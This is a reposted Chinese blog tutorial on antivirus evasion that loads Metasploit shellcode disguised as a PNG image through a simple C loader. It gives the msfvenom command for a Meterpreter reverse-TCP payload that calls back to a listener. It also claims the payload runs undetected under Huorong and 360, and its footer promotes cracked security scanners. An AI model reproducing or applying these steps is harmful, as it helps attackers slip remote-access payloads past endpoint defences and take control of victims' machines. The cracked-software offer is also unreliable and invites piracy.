【免杀初探】宇将军亲传—利用C加载图片shellcode免杀
2022-9-5 09:49:28 Author: 棉花糖网络安全圈(查看原文) 阅读量:40 收藏

以下内容转载自公众号:猫因的安全

“当我在进程里看见一只豆豆鞋时,我就知道我们都多余了” ——“360”“火绒”

🌳实现一个C加载器

上面的加载器用了很简单的实现,没有做任何加密解密的处理

下面的shellcode也不打算做任何加密解密的处理

🥗利用MSF生成shellcode

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.112.128 port=4444 -f raw -o shell.png

这里就是简单生成一个图片shellcode

不涉及加解密

📐把加载器编译成exe文件

这里先选好32位(X86)的release

然后

直接生成解决方案

得到exe文件

🎇运行程序测试效果

火绒静态查杀直接bypass

下面直接尝试在开启火绒的条件下运行,首先MSF开启监听:

直接运行:

火绒毫无反应

尝试弹个计算器:

都多余了!

360同理:

awvs,appscan等 软件破解版以及各类资料文档,可以查阅历史文章获取

本篇文章封面获取:后台回复0905


文章来源: http://mp.weixin.qq.com/s?__biz=Mzg5NTYwMDIyOA==&mid=2247488704&idx=1&sn=e0e8125d7cacbae2151c069819b99f36&chksm=c00c87cbf77b0eddc140071b836090d969024b7f8ec100d132a303f562447fa11685cfbdcb38#rd
如有侵权请联系:admin#unsafe.sh